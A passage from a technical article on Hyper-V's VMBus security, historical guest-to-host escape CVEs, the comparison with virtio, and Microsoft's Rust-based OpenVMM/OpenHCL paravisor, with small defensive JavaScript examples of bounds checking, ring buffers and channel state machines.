This dual-use is the reason a serious Windows security review touches the Hyper-V codebase even on machines that nobody thinks of as virtualization hosts. A Hyper-V escape (a guest-to-host VMBus exploit) is not just "an exploit against Azure"; it is also, on a typical Windows 11 desktop with VBS enabled, an exploit against the boundary that protects LSASS secrets from kernel-mode malware.

That makes the next section's question urgent: how strong is the VMBus boundary, in practice?

7. VMBus security: every message is a parser at the trust boundary

Here is the part of the architecture worth being honest about. The same property that makes VMBus fast, namely that the host-side VSP runs in the root partition's kernel and parses guest-supplied bytes directly, also makes the VSP the most consequential piece of attack surface in the entire stack. Microsoft itself prices it that way: the Hyper-V Bug Bounty Program [@ms-bounty-hyperv] pays up to USD 250,000 specifically for guest-to-host escapes that hit this surface, which is among the highest payouts Microsoft offers for any category of vulnerability.

Key idea: Every byte that crosses a VMBus channel from a guest is a byte that a kernel-mode parser in the most privileged partition on the host has to interpret. The performance argument for a software data plane and the security argument against it are the same argument, looked at from opposite directions.

The historical record

Three CVEs make the pattern concrete:

CVE-2017-0075 is a Hyper-V guest-to-host escape that Microsoft patched in March 2017. The NVD entry [@nvd-cve-2017-0075] describes it as a Hyper-V flaw that "allows guest OS users to execute arbitrary code on the host OS via a crafted application." The reachable code was in a VMBus message handler on the host side.
CVE-2021-28476 is the canonical example. The NVD record [@nvd-cve-2021-28476] classifies it as a critical Hyper-V remote code execution vulnerability with a CVSS score of 9.9. The Akamai writeup with Guardicore and SafeBreach [@akamai-cve-2021-28476] traces the bug to vmswitch.sys, the synthetic-NIC VSP, and shows it had been present in production since the August 2019 vmswitch build. The exploit primitive is exactly what the architecture invites: a guest crafts an OID-style RNDIS request, sends it through the netvsc VMBus channel, and the host's kernel parser fails to validate the request and dereferences an attacker-influenced pointer, corrupting memory in the most privileged kernel on the box.
CVE-2024-21407 is a more recent Hyper-V remote code execution vulnerability patched in March 2024 (NVD [@nvd-cve-2024-21407]). Its existence demonstrates that the bug class did not vanish; the same shape (guest-controlled message, host kernel parser, escalation to host code execution) keeps reappearing.

The bounty ranges from $5,000 for low-impact bugs to $250,000 for full guest-to-host escapes (Microsoft bounty page [@ms-bounty-hyperv]). That price point is not a marketing number; it is Microsoft signalling what its threat model says these bugs are worth. A defender pricing their own controls should treat any VSP code path that parses guest-controlled data as a category that justifies the same level of attention as remote internet-facing services.

Why the bug class is structural

The pattern in all three CVEs is the same:

A guest writes carefully crafted bytes into a VMBus channel ring.
The guest fires the doorbell.
The host's VSP, running in the root partition's kernel, dequeues the message.
The VSP parses the message in C or C++ kernel code.
A memory-safety mistake (length confusion, missing bounds check, integer overflow) becomes a write or read primitive in the host kernel.

There is no exotic mechanism here. The exploit surface is "kernel C code parsing untrusted input," which has been the dominant source of remote-code-execution bugs in operating systems since the 1990s. The novelty is the location: the parser runs inside the most privileged partition on the box, with access to every other tenant's memory.
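The check that goes missing in step 5 is small enough to show in full. The sketch below uses a made-up wire format (4-byte type, 4-byte declared length, then payload), not the real RNDIS or VMBus layout, and `parseMessage` / `makeMessage` are hypothetical names. JavaScript is memory-safe, so this illustrates the validation itself; in kernel C, omitting the same comparison is what turns a lying length field into an out-of-bounds access.

```javascript
// Hypothetical wire format: u32 type, u32 payload length (both little-endian),
// followed by the payload bytes.
const HEADER_SIZE = 8;

function parseMessage(buf) {
  if (buf.length < HEADER_SIZE) {
    throw new RangeError('truncated header');
  }
  const type = buf.readUInt32LE(0);
  const claimedLength = buf.readUInt32LE(4);
  // The sender controls claimedLength. Compare it with the bytes actually
  // received before using it as a bound.
  if (claimedLength > buf.length - HEADER_SIZE) {
    throw new RangeError('declared length exceeds received bytes');
  }
  return { type, payload: buf.subarray(HEADER_SIZE, HEADER_SIZE + claimedLength) };
}

// Test helper: build a message whose declared length may not match reality.
function makeMessage(type, claimedLength, payloadBytes) {
  const buf = Buffer.alloc(HEADER_SIZE + payloadBytes.length);
  buf.writeUInt32LE(type, 0);
  buf.writeUInt32LE(claimedLength, 4);
  Buffer.from(payloadBytes).copy(buf, HEADER_SIZE);
  return buf;
}

const honest = parseMessage(makeMessage(1, 3, [0xaa, 0xbb, 0xcc]));
let rejected = false;
try {
  parseMessage(makeMessage(1, 0xffff, [0xaa])); // declares far more than it sent
} catch (err) {
  rejected = err instanceof RangeError;
}

console.log(honest.payload.length, rejected);
```

Note that the comparison is written as `claimedLength > buf.length - HEADER_SIZE` rather than `HEADER_SIZE + claimedLength > buf.length`; in a language with fixed-width integers the second form can itself overflow, which is one of the classic variants of this bug class.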

```mermaid
sequenceDiagram
    participant Mal as Malicious guest VM
    participant Ring as VMBus ring (shared memory)
    participant SInt as Synthetic Interrupt Controller
    participant VSP as Host VSP (e.g., vmswitch.sys, kernel)
    Mal->>Ring: Write crafted RNDIS-style message
    Mal->>SInt: Hypercall: signal channel event
    SInt-->>VSP: SINT delivered on host CPU
    VSP->>Ring: Read message header
    note over VSP: Length confusion / missing bounds check
    VSP->>VSP: Out-of-bounds write in root partition kernel
    note over VSP: Result: arbitrary code in the most privileged partition
```

Mitigations short of a rewrite

Microsoft's first line of defence is the same one every kernel team uses: ASLR, control-flow integrity, kernel hardening, fuzzing the parsers, code review of every new device class, and, on Azure specifically, isolating each tenant's compute hypervisor so a single compromised host does not become a multi-tenant disaster. The MSRC bounty program is partly a procurement mechanism for this same effort: pay researchers to find and report bugs before attackers find them in the wild.

A second line of defence is Generation-2 VMs (Microsoft Learn [@ms-gen1-gen2-vms]), which remove the legacy emulators (IDE, PS/2, PIC) from the host data path entirely. Every emulator removed is one fewer parser in the most privileged kernel.

A third is the "minimise root-partition exposure" guidance in the Microsoft Hyper-V architecture page [@ms-hyperv-architecture-perf]: configure hosts with the smallest set of root-partition services that the workload requires, since every service is potential surface.

These all help, but none of them change the structural fact that VSPs parse guest-controlled data in C/C++ kernel code. The next architectural shift, the one that does change that fact, is what Section 9 is about.

Side channels and the Spectre era

VMBus also has to defend against side-channel attacks across the partition boundary. The same Spectre / Meltdown / L1TF mitigations that apply to a multi-tenant hypervisor in general apply to Hyper-V specifically. Microsoft's broader hypervisor mitigation strategy interacts with VMBus mostly indirectly: the SynIC, the hypercall page, and the timer subsystem all needed audit and adjustment when these classes of attacks emerged. The detail is largely outside the scope of an article about the device model, but the takeaway is consistent with the rest of this section: any shared CPU resource between partitions is a potential attack surface, and "shared via the hypervisor's bus" is no exception.

The structural answer to all of this, the one Microsoft itself has been working toward, is to change the languages and the trust boundaries. To set that up, the next section first widens the field by comparing VMBus to its peer in the KVM world, virtio.

8. VMBus vs virtio: two answers to the same question

Hyper-V is not the only hypervisor with a paravirt I/O story. The KVM world evolved its own answer to the same problem at roughly the same time, and it ended up with a different design with different trade-offs. The standard is virtio.

The original virtio paper, Rusty Russell's "virtio: Towards a De-Facto Standard For Virtual I/O Devices" [@rusty-virtio-paper], appeared in ACM SIGOPS Operating Systems Review in 2008, the same year Hyper-V shipped. The proposal was explicit in its motivation: every hypervisor was reinventing paravirt drivers, and a single hypervisor-independent specification could let one guest driver work everywhere. OASIS later standardised virtio 1.0 in 2016, then published virtio 1.1 in 2019 [@oasis-virtio-1-1] and virtio 1.2 as a Committee Specification in 2022 [@oasis-virtio-1-2].

**virtio**: a hypervisor-independent paravirtual I/O specification, governed by OASIS. A virtio device is presented to the guest over a transport (PCI, MMIO, or s390 channel I/O) that advertises capability bits. The data plane is a generic ring layout called a **virtqueue**: a ring of descriptors, an `avail` ring (guest-to-host), and a `used` ring (host-to-guest). Each device class (virtio-net, virtio-blk, virtio-scsi, virtio-fs, virtio-gpu) defines its own message format on top of virtqueues.

The same shape, viewed sideways

Architecturally, virtio and VMBus are sibling answers to the same shaped problem.

```mermaid
flowchart LR
    subgraph virtio_pci["virtio over PCI"]
        gv["Guest virtio driver"]
        vq["virtqueue (descriptors + avail + used)"]
        host_be["Host backend (vhost-net, vhost-user, OpenVMM)"]
        gv -- "PIO doorbell write" --> host_be
        gv -- "shared memory" --- vq
        host_be -- "shared memory" --- vq
        host_be -- "MSI-X" --> gv
    end
    subgraph vmbus["Hyper-V VMBus"]
        gv2["Guest VSC"]
        ring["Two ring buffers + GPADL"]
        vsp["Host VSP (kernel)"]
        gv2 -- "Hypercall doorbell" --> vsp
        gv2 -- "shared memory" --- ring
        vsp -- "shared memory" --- ring
        vsp -- "SINT" --> gv2
    end
```

Both:

Use shared-memory rings for payload. (The phrase "shared-memory rings" hides a small subtlety: a ring buffer is a circular buffer with separate read and write indices. Producer and consumer can run concurrently as long as they only touch their own index, which is what makes ring buffers a wait-free communication primitive on cache-coherent hardware.)
Use a doorbell for signalling.
Batch many requests per doorbell so per-message hypercall cost amortises.
Have per-class device protocols layered on top of a common transport.
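The ring-buffer property in the first bullet, where each side advances only its own index, can be shown with a minimal single-producer/single-consumer ring. This is a sketch of the general technique only: real VMBus rings and virtqueues have richer layouts and need memory barriers between the data write and the index update, which single-threaded JavaScript does not model. `SpscRing` is a name made up for this example.

```javascript
// Minimal single-producer/single-consumer ring buffer.
class SpscRing {
  constructor(capacity) {
    this.slots = new Array(capacity);
    this.capacity = capacity;
    this.writeIndex = 0; // advanced only by the producer
    this.readIndex = 0;  // advanced only by the consumer
  }

  // Producer: returns false when full. One slot is kept empty so that
  // writeIndex === readIndex always means "empty", never "full".
  push(item) {
    const next = (this.writeIndex + 1) % this.capacity;
    if (next === this.readIndex) return false;
    this.slots[this.writeIndex] = item;
    this.writeIndex = next; // publish after the slot is filled
    return true;
  }

  // Consumer: returns undefined when empty.
  pop() {
    if (this.readIndex === this.writeIndex) return undefined;
    const item = this.slots[this.readIndex];
    this.readIndex = (this.readIndex + 1) % this.capacity;
    return item;
  }
}

const spsc = new SpscRing(4);
const accepted = ['a', 'b', 'c', 'd'].map((x) => spsc.push(x)); // holds capacity - 1 items
const drained = [spsc.pop(), spsc.pop(), spsc.pop(), spsc.pop()];

console.log(accepted, drained);
```

Because `push` writes only `writeIndex` and `pop` writes only `readIndex`, neither side ever needs a lock on the other's state; the cost is the one sacrificed slot that disambiguates full from empty.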

The differences are where the world bites:

| Dimension | VMBus | virtio (1.2) |
|---|---|---|
| Transport | Software-only "bus", channel offer/open/close | PCI, MMIO, s390 channel I/O |
| Doorbell | Hypercall (`HvCallSignalEvent`) | PIO write to a doorbell BAR |
| Reverse signal | Synthetic interrupt (SINT) | MSI-X |
| Standardisation | Microsoft-owned, Open Specification Promise [@ms-tlfs] | OASIS-ratified, multi-vendor |
| Windows in-box drivers | Yes, every supported version | No; out-of-box signed VirtIO INFs from cloud vendors |
| Device classes beyond I/O | Yes: KVP, time sync, VSS, balloon | Limited; non-I/O often built on virtio-vsock or out-of-band agents |
| Cross-hypervisor portability | Hyper-V only | Universal: KVM, QEMU, Cloud Hypervisor, Firecracker, Xen HVM, OpenVMM |
| Spec governance | Single vendor under OSP | Multi-vendor with formal conformance clauses |
| Source for Linux side | drivers/hv/ [@kernel-hyperv-index] | drivers/virtio in the Linux tree |

Where each design wins

Virtio's strongest claim is portability. The same Linux guest VM image, with the same in-tree virtio drivers, runs on KVM, QEMU, Cloud Hypervisor, AWS Firecracker, and (since 2024) Microsoft's own OpenVMM, which added virtio backend support. A workload that has to move between cloud providers benefits from this directly: the guest does not need a different driver stack per host.

Virtio also has a richer multi-vendor governance story. The spec is OASIS-ratified, with explicit conformance clauses; multiple commercial hypervisors implement it; multiple SmartNIC vendors implement virtio data planes in hardware (the vDPA and VDUSE work, described by Red Hat [@redhat-vdpa] and the Linux kernel VDUSE doc [@kernel-vduse]).

VMBus's strongest claim is integration. Every supported Windows ships with the VSCs in-box; there is nothing for an admin to install. The transport carries not just I/O but a service catalogue: KVP for guest configuration, time sync, VSS for online backup, the heartbeat and shutdown channels. The TLFS, while owned by Microsoft, is published under the Open Specification Promise and is a single document a guest author can read end-to-end.

This is why "VirtIO drivers for Windows" exist as a separate project (the Fedora/Red Hat-signed virtio-win package) for KVM clouds: out of the box, Windows does not know virtio. The Hyper-V world inverts the problem: out of the box, Linux does not need any third-party install because the drivers are upstream.

Where they coexist

The most interesting recent development is that the two camps have stopped being purely competitive. Microsoft's OpenVMM [@github-openvmm] implements both VMBus and virtio backends, so a Linux guest using virtio drivers can run on a Microsoft-developed VMM, and a Windows guest using VMBus drivers can run on the same VMM. This is partially ideological (Microsoft is no longer pretending its way is the only way) and partially pragmatic (a single VMM that supports both transports is simpler than maintaining two).

Beyond the protocol-level comparison, both VMBus and virtio sit inside a larger composition with hardware passthrough, where the transport becomes the slow path and a real PCIe device carries the steady-state traffic.

Hardware passthrough as a complement

The composition that runs almost every modern Azure VM is VMBus + SR-IOV, packaged as Accelerated Networking [@ms-accelerated-networking]. The same VM gets both a synthetic NIC (netvsc over VMBus) and an SR-IOV virtual function. The Linux netvsc driver documentation describes the failover mechanic: "If SR-IOV is enabled in both the vSwitch and the guest configuration, then the Virtual Function (VF) device is passed to the guest as a PCI device. In this case, both a synthetic (netvsc) and VF device are visible in the guest OS and both NIC's have the same MAC address. The VF is enslaved by netvsc device. The netvsc driver will transparently switch the data path to the VF when it is available and up." (Linux kernel: netvsc [@kernel-netvsc]).

When live migration starts, Azure revokes the VF, the data plane falls back to the netvsc/VMBus path, the VM moves, and a new VF on the destination host gets re-attached, all without dropping TCP connections. The VMBus path was never the production hot path, but its existence is what enables migration. The KVM world's analogue is vDPA, which gives a virtio-shaped guest interface backed by a hardware data plane.
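The failover mechanic reduces to a small state machine. The sketch below is a toy model under stated assumptions: the `SyntheticNic` class, its method names, and the example MAC address are invented for illustration, and the real logic lives in the Linux netvsc driver.

```javascript
// Toy model of the netvsc + VF data-path switch.
class SyntheticNic {
  constructor(mac) {
    this.mac = mac;
    this.vf = null; // attached SR-IOV virtual function, if any
    this.sent = { vf: 0, vmbus: 0 };
  }

  // The VF shares the synthetic NIC's MAC address, so reject a mismatch.
  attachVf(vf) {
    if (vf.mac !== this.mac) throw new Error('VF must share the synthetic MAC');
    this.vf = vf;
  }

  revokeVf() {
    this.vf = null;
  }

  // Use the VF when it is present and up; otherwise fall back to VMBus.
  transmit() {
    const path = this.vf && this.vf.up ? 'vf' : 'vmbus';
    this.sent[path] += 1;
    return path;
  }
}

const mac = '00:15:5d:00:00:01'; // example address only
const nic = new SyntheticNic(mac);
const paths = [];
paths.push(nic.transmit());        // before the VF arrives
nic.attachVf({ mac, up: true });
paths.push(nic.transmit());        // steady state on the VF
nic.revokeVf();                    // live migration starts
paths.push(nic.transmit());        // falls back to VMBus
nic.attachVf({ mac, up: true });   // new VF on the destination host
paths.push(nic.transmit());

console.log(paths);
```

The caller of `transmit()` never learns which path was used, which is the property that lets TCP connections survive the migration: the guest's network stack only ever sees the synthetic NIC.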

A modern Azure NIC stack is pushing this even further. Azure Boost [@ms-azure-boost] moves both storage and networking data planes off the host CPU into dedicated FPGAs, with a stable Microsoft-engineered NIC interface called MANA [@ms-mana]. Microsoft's documentation reports up to 200 Gbps of network bandwidth and 6.6 million IOPS on local storage with this design, with the host's vmswitch still acting as the live-migration fallback path. The architectural insight is that the VMBus-based slow path is the durable invariant; what changes is whether the steady-state data plane is software, an SR-IOV VF, or a SmartNIC firmware path. Frameworks like DPDK [@dpdk-about] sit on top of whichever data plane the VM exposes.

What none of this changes is the property Section 7 cared about: as long as a host-side VSP exists and parses guest-controlled bytes in kernel C/C++, the bug class is open. The next section is about the architectural move that closes it.

9. OpenVMM and OpenHCL: the 2024 open-source pivot

In 2024, Microsoft did two things that would have been hard to imagine a decade earlier. First, they open-sourced OpenVMM [@github-openvmm], a Rust implementation of the virtualization stack including the VSPs and the VMBus protocol. Second, they introduced OpenHCL [@ms-openhcl-deep-explainer], a "paravisor" configuration of OpenVMM that runs inside a confidential VM as a higher-trust mediator between the workload and the (now-untrusted) host.

Both moves are explained by the same trend the article has been circling: confidential computing fundamentally inverts the trust boundary, and the device model has to follow.

Paravisor: a higher-privileged software layer that runs *inside* a guest VM (not on the host) and mediates the guest's interaction with the hypervisor. In the Hyper-V model, a paravisor lives in VTL2 of the same VM whose workload runs in VTL0; the host hypervisor is outside the VM's trust boundary. The paravisor presents the workload with a familiar VMBus + VSP interface while internally talking to a hardware-isolated confidential VM substrate (AMD SEV-SNP or Intel TDX).

What changed in confidential computing

The classical Hyper-V trust model places the root partition at the apex of trust. The guest trusts the host. Memory the guest writes is, in the worst case, readable by the host. In confidential computing, that is no longer acceptable. A regulated workload (a healthcare database, a financial processor) needs to run in a VM whose contents are protected even from a malicious or compromised hypervisor. AMD's SEV-SNP and Intel's TDX are CPU features that encrypt and integrity-protect VM memory in hardware so that a compromised host cannot read the guest's secrets.

Azure Confidential Computing [@ms-confidential-computing] made these capabilities available as a product starting around 2022. The Azure confidential VM options page [@ms-coco-vm-options] documents the SKUs.

This breaks the old VMBus story. In the classical model, the host's vmswitch.sys reads the guest's network packets out of the VMBus ring. In a confidential VM, you can no longer let the host see those bytes; doing so would defeat the entire point of the protection. So the question becomes: where does the synthetic-device backend live, if not in the host?

The paravisor answer

The Linux kernel's Hyper-V CoCo VMs document [@kernel-coco] describes the design directly: "Paravisor mode. In this mode, a paravisor layer between the guest and the host provides some operations needed to run as a CoCo VM. The guest operating system can have fewer CoCo enlightenments than is required in the fully-enlightened case ... some aspects of CoCo VMs are handled by the Hyper-V paravisor while the guest OS must be enlightened for other aspects."

OpenHCL is that paravisor. It runs in a higher-trust virtual trust level inside the same confidential VM (VTL2), it has access to the encrypted-memory primitives the CPU provides, and it presents the workload (in VTL0) with the same VMBus + VSP world a non-confidential VM would see. The workload OS does not need to be heavily modified; it sees what looks like Hyper-V, talks to what look like normal VSPs, and never has to know that those VSPs are now inside its own VM rather than on the host.

flowchart TD
    HW["Confidential CPU (SEV-SNP / TDX)"]
    HV["Host hypervisor (untrusted by the workload)"]
    subgraph CoCoVM["Confidential VM (memory encrypted)"]
        VTL2["VTL2: OpenHCL paravisor (Rust VSPs)"]
        VTL0["VTL0: workload OS (Windows or Linux, lightly enlightened)"]
        VTL0 -- "VMBus, looks normal" --- VTL2
    end
    HW --> HV
    HV --> CoCoVM
    HV -. "no access to guest plaintext" .-> CoCoVM

The Rust rewrite

The other half of the story is memory safety. Recall Section 7's CVE list: every headline Hyper-V escape in the past decade involved a parser bug in C/C++ kernel code. OpenVMM's choice to implement the entire VMM, including the VSPs, in Rust is a direct response to that history. Rust's ownership model rules out, by construction, a large class of memory-safety bugs (use-after-free, out-of-bounds access on slices, double-free) that produced those CVEs.

This does not magically eliminate every vulnerability. A logic bug in a state machine, an integer-overflow on a length field, a side-channel timing leak: all of these still exist in Rust. But the categories that produced CVE-2017-0075, CVE-2021-28476, and CVE-2024-21407 are exactly the categories Rust was designed to make hard.
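To make the "length field" class concrete, here is a minimal sketch of the validation a parser still has to do by hand in any language. The wire format (a 4-byte little-endian length followed by a payload) and the 4096-byte limit are assumptions invented for this example; they are not a real VMBus packet layout.

```javascript
// Hypothetical wire format, for illustration only:
//   bytes 0..3  payload length, little-endian uint32
//   bytes 4..   payload
const HEADER_BYTES = 4;
const MAX_PAYLOAD = 4096; // assumed protocol limit

function parseMessage(buf) {
  if (!(buf instanceof Uint8Array)) throw new TypeError('expected Uint8Array');
  if (buf.length < HEADER_BYTES) return { ok: false, error: 'short header' };
  const view = new DataView(buf.buffer, buf.byteOffset, buf.byteLength);
  const claimed = view.getUint32(0, true);
  // Never trust the sender's length: check it against the protocol limit
  // and against the number of bytes actually received.
  if (claimed > MAX_PAYLOAD) return { ok: false, error: 'length exceeds limit' };
  if (claimed > buf.length - HEADER_BYTES) {
    return { ok: false, error: 'length exceeds buffer' };
  }
  // slice() copies, so later writes to the source buffer cannot change
  // the bytes that were just validated.
  const payload = buf.slice(HEADER_BYTES, HEADER_BYTES + claimed);
  return { ok: true, payload };
}

const good = parseMessage(Uint8Array.from([2, 0, 0, 0, 0xaa, 0xbb]));
const lying = parseMessage(Uint8Array.from([0xff, 0xff, 0xff, 0xff, 0xaa]));
console.log(good.ok, lying.ok, lying.error);
```

A memory-safe language turns a missed check like this into a clean error or a panic instead of an out-of-bounds read, but deciding what the limits are remains the parser author's job.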

Garbage-collected languages are a poor fit for a kernel-mode parser: GC pauses are unacceptable in a hypervisor-adjacent fast path, and you cannot afford a runtime that allocates memory during interrupt handling. Rust's compile-time memory safety with no GC is, today, the only mature option that gives you both the safety and the predictability a VSP needs. Microsoft's choice is consistent with the rest of the industry; comparable low-level systems infrastructure (Cloudflare's `quiche` and Pingora, Mozilla's `neqo`, parts of the Android Bluetooth stack) has converged on Rust.

What you can actually look at

OpenVMM is not a press release; it is a public repository that ships:

The full Rust source tree at github.com/microsoft/openvmm [@github-openvmm].
A separate repository for the Linux kernel fork that the paravisor runs on top of, at github.com/microsoft/OHCL-Linux-Kernel [@github-ohcl-linux].
Project documentation centred at openvmm.dev [@openvmm-dev].
Both VMBus and virtio backends, so the same VMM can host Windows guests on VMBus and Linux guests on virtio.
Documentation through the deeper Microsoft Tech Community explainer [@ms-openhcl-deep-explainer] and the original announcement [@ms-openhcl-announce] describing the paravisor's role.

For a security researcher or a regulated-cloud customer, this is a meaningful change. For the first time, the VMBus + VSP stack is auditable end-to-end in source.

If you want to see how a VSP actually consumes a channel, the OpenVMM repository contains the Rust modules that implement the VMBus channel state machine. Cloning the repo and grepping for `Channel::open` and `RingBuffer` shows the same offer/open/close/rescind pattern Section 3 described, expressed in Rust types whose lifetimes the compiler checks. Reading the same logic in Rust after reading the Linux C version in `drivers/hv/channel_mgmt.c` is a useful exercise; the abstraction is identical, and the safety guarantees diverge.
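Before reading either codebase, it can help to hold the lifecycle in your head as a transition table. The sketch below is a simplified model under stated assumptions: the state and event names are illustrative rather than OpenVMM or Linux identifiers, and it assumes that closing a channel returns it to the offered state.

```javascript
// Sketch of the offer/open/close/rescind lifecycle as a transition table.
// State and event names are illustrative, not real driver identifiers.
const TRANSITIONS = {
  none:      { offer: 'offered' },
  offered:   { open: 'open', rescind: 'rescinded' },
  open:      { close: 'offered', rescind: 'rescinded' },
  rescinded: {}, // terminal: a rescinded offer must not be reused
};

class Channel {
  constructor() { this.state = 'none'; }
  apply(event) {
    const next = TRANSITIONS[this.state][event];
    if (next === undefined) {
      throw new Error(`illegal transition: ${event} in state ${this.state}`);
    }
    this.state = next;
    return this.state;
  }
}

const ch = new Channel();
const trace = ['offer', 'open', 'close', 'open', 'rescind'].map((e) => ch.apply(e));
console.log(trace.join(' -> '));

// Any use after rescind is rejected instead of touching freed state.
let rejected = false;
try { ch.apply('open'); } catch (e) { rejected = true; }
console.log('open after rescind rejected:', rejected);
```

An explicit table makes illegal transitions a checked error. That is the property typed Rust code tries to enforce at compile time and that C code has to enforce by discipline.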

What still has to be solved

The kernel CoCo doc is candid about an open architectural problem that OpenHCL alone cannot solve: "Unfortunately, there is no standardized enumeration of feature/functions that might be provided in the paravisor, and there is no standardized mechanism for a guest OS to query the paravisor for the feature/functions it provides. The understanding of what the paravisor provides is hard-coded in the guest OS." (Linux kernel: CoCo VMs [@kernel-coco]).

In other words, the TLFS gave us a portable contract between guests and Hyper-V hypervisors. The paravisor world does not yet have an equivalent portable contract between guests and paravisors. Today's guests have OpenHCL-specific knowledge baked in. A future "paravisor TLFS" would let any compliant paravisor host any compliant guest, the same way the original TLFS did for the hypervisor. That standard does not exist yet, and writing it is the most consequential open problem in this corner of the architecture.

The architecture is moving. Section 10 takes stock of what that means for engineers building or operating on this stack today.

10. Engineering takeaways and open problems

A working architecture is one where the trade-offs are visible. Hyper-V's enlightenments + VMBus + VSP/VSC stack is a working architecture in exactly that sense: every property it has, including the security ones, is a consequence of design choices a reader can name.

What the design optimises for

Three explicit optimisations:

In-box drivers for closed-source guests. Hardware virtualization handles privileged CPU instructions; the guest only needs to load a VMBus client driver to opt in to the fast path. Every supported Windows ships those drivers in-box. Every modern Linux ships them in-tree. There is no "install paravirt drivers" step, which is a large reason "it just works."
A single transport that carries everything. VMBus carries 12+ device classes plus non-device services (KVP, time sync, VSS, balloon, heartbeat). One protocol, one set of primitives, one debugging surface. This is the engineering equivalent of "everything is a file" applied to inter-partition communication.
Live migration. Because the data plane is software in the root partition, the VM is not bound to a specific host. The VSPs serialise their state during migration without guest cooperation. This is the property that makes VMBus the durable invariant under hardware-passthrough acceleration: SR-IOV gives you throughput; VMBus gives you mobility.

What it pays for those properties

Two costs:

The host CPU is on the data plane. A software ring serviced by vmswitch.sys cannot match a 100 GbE NIC's line rate per host CPU core. Microsoft's answer is hybrid composition with SR-IOV (Accelerated Networking [@ms-accelerated-networking]) and SmartNIC offload (Azure Boost + MANA [@ms-azure-boost]). The KVM analogue is vDPA [@redhat-vdpa]. Both of these accept the structural truth that for the highest throughputs, the host CPU has to leave the data plane.
The host kernel parses guest-controlled bytes. Section 7's CVE record is the catalogue of what that costs. The architectural answer is OpenHCL: move the parser into the guest's own trust boundary and rewrite it in Rust.
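The first cost can be made concrete with back-of-the-envelope arithmetic. The sketch below computes the per-packet cycle budget a single core would have at 100 GbE line rate. Every input is an assumption chosen for illustration (a 3 GHz core, standard Ethernet framing overhead), not a measured Hyper-V figure.

```javascript
// Back-of-the-envelope budget: CPU cycles available per packet if one core
// had to service a 100 GbE link at line rate. All inputs are assumptions.
const LINK_BITS_PER_SEC = 100e9; // 100 GbE
const WIRE_OVERHEAD = 38;        // header 14 + FCS 4 + preamble 8 + inter-frame gap 12
const CORE_HZ = 3e9;             // assumed 3 GHz core

function packetsPerSecond(linkBps, payloadBytes) {
  return linkBps / ((payloadBytes + WIRE_OVERHEAD) * 8);
}

function cyclesPerPacket(coreHz, pps) {
  return coreHz / pps;
}

const ppsFull = packetsPerSecond(LINK_BITS_PER_SEC, 1500); // full-size frames
const ppsSmall = packetsPerSecond(LINK_BITS_PER_SEC, 46);  // minimum-size frames

console.log('1500-byte payload:', Math.round(ppsFull), 'pps,',
  Math.round(cyclesPerPacket(CORE_HZ, ppsFull)), 'cycles/packet');
console.log('46-byte payload:', Math.round(ppsSmall), 'pps,',
  Math.round(cyclesPerPacket(CORE_HZ, ppsSmall)), 'cycles/packet');
```

Under these assumptions the budget is a few hundred cycles per full-size packet and roughly twenty for minimum-size frames. That leaves little room for a ring dequeue, a parse, and a switch lookup in software, which is the structural reason the data plane moves to hardware.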

A four-property idealisation

It is useful to write down what an idealised paravirt I/O stack would do, so it is clear which properties any real stack today is trading away.

The four idealised properties:

Zero hypercalls per packet in steady state.
Live-migration parity with a software baseline.
Cross-vendor / cross-hypervisor portability of the guest driver.
No host-side memory-unsafe parser of guest-controlled data.

Approach	(1) Zero hypercall	(2) Live migration	(3) Portability	(4) No unsafe host parser
VMBus + in-kernel VSP	partial (batched)	yes	no	no
virtio + vhost-net	partial (batched)	yes	yes	no
SR-IOV / DDA	yes	no	no	yes
Accelerated Networking (VMBus + SR-IOV)	yes (steady)	yes	no	no
vDPA	yes	partial	yes	no
OpenHCL paravisor + VMBus	partial	yes	partial	yes
Azure Boost + MANA	yes	yes	no	partial

No single approach today matches all four properties. The Hyper-V production composition is roughly (VMBus baseline) + (Accelerated Networking for throughput) + (OpenHCL for confidential workloads). The KVM-world composition is (virtio baseline) + (vDPA / SmartNIC for throughput). SmartNIC-based stacks (Azure Boost, AWS Nitro, Google's offload) approach the same four-corner problem from yet another angle.
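The claim that no row satisfies all four properties can be checked mechanically. The sketch below encodes the matrix as data and lists what each approach is missing. Two simplifications are assumptions of this example: qualified cells such as "partial (batched)" and "yes (steady)" are normalised to `partial` and `yes`, and anything other than a full `yes` counts as a gap.

```javascript
// The four-property matrix encoded as data. Column order:
// zero hypercalls, live migration, portability, no unsafe host parser.
const PROPERTIES = ['zero hypercalls', 'live migration', 'portability', 'no unsafe host parser'];
const MATRIX = {
  'VMBus + in-kernel VSP': ['partial', 'yes', 'no', 'no'],
  'virtio + vhost-net': ['partial', 'yes', 'yes', 'no'],
  'SR-IOV / DDA': ['yes', 'no', 'no', 'yes'],
  'Accelerated Networking (VMBus + SR-IOV)': ['yes', 'yes', 'no', 'no'],
  'vDPA': ['yes', 'partial', 'yes', 'no'],
  'OpenHCL paravisor + VMBus': ['partial', 'yes', 'partial', 'yes'],
  'Azure Boost + MANA': ['yes', 'yes', 'no', 'partial'],
};

// Properties an approach does not fully deliver ("partial" counts as a gap).
function gaps(approach) {
  return PROPERTIES.filter((_, i) => MATRIX[approach][i] !== 'yes');
}

const fullyMet = Object.keys(MATRIX).filter((a) => gaps(a).length === 0);
console.log('approaches meeting all four:', fullyMet.length);
for (const approach of Object.keys(MATRIX)) {
  console.log(approach + ': missing ' + gaps(approach).join(', '));
}
```

Reading the output row by row also shows why compositions are the norm: the gaps of one approach tend to be the strengths of another.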

This is a synthesis, not a single-source claim: the matrix combines properties documented separately in the Microsoft Accelerated Networking docs [@ms-accelerated-networking], the Linux kernel CoCo doc [@kernel-coco], the Discrete Device Assignment doc [@ms-dda], the SR-IOV overview [@ms-sriov-overview], the Linux netvsc driver doc [@kernel-netvsc], the VDUSE userspace interface [@kernel-vduse], the vPCI doc [@kernel-vpci], and the OpenHCL explainer [@ms-openhcl-deep-explainer]. Each individual cell is sourced; combining them into a single matrix is the author's reading of those sources.

Practical pitfalls for operators

A few things the customer-facing docs do not always say plainly:

vmbusrhid is not low-risk. The keyboard/mouse channel is a kernel-level RPC surface from guest to root. Treat it the same way you would treat netvsc when modelling threat exposure.
Generation-2 VMs reduce attack surface. Choosing Generation-2 for new workloads removes the legacy IDE/PS/2/PIC emulators from the host data path entirely (Microsoft Learn: Gen 1 vs Gen 2 [@ms-gen1-gen2-vms]).
Mixing in-box and out-of-band Integration Services breaks things. Modern Windows and modern Linux already have the drivers; installing the legacy LIS package on top can break MSI-X handling and PCI passthrough (Linux kernel: overview [@kernel-hyperv-overview]).
